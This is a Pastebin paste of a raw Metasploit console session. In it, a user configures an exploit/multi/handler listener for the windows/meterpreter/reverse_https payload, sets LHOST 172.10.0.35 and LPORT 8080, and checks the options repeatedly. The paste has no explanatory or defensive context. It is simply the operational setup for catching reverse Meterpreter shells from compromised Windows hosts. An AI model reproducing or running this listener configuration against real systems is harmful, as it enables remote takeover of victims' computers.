Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
- PAYLOAD => windows/meterpreter/reverse_https
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_https):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST yes The local listener hostname
- LPORT 8443 yes The local listener port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > setg LHOST 172.10.0.35
- LHOST => 172.10.0.35
- msf exploit(handler) > setg LPORT 8080
- LPORT => 8080
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_https):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST 172.10.0.35 yes The local listener hostname
- LPORT 8443 yes The local listener port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) > set LPORT 8080
- LPORT => 8080
- msf exploit(handler) > show options
- Module options (exploit/multi/handler):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Payload options (windows/meterpreter/reverse_https):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process, none
- LHOST 172.10.0.35 yes The local listener hostname
- LPORT 8080 yes The local listener port
- Exploit target:
- Id Name
- -- ----
- 0 Wildcard Target
- msf exploit(handler) >
Advertisement
Add Comment
Please, Sign In to add comment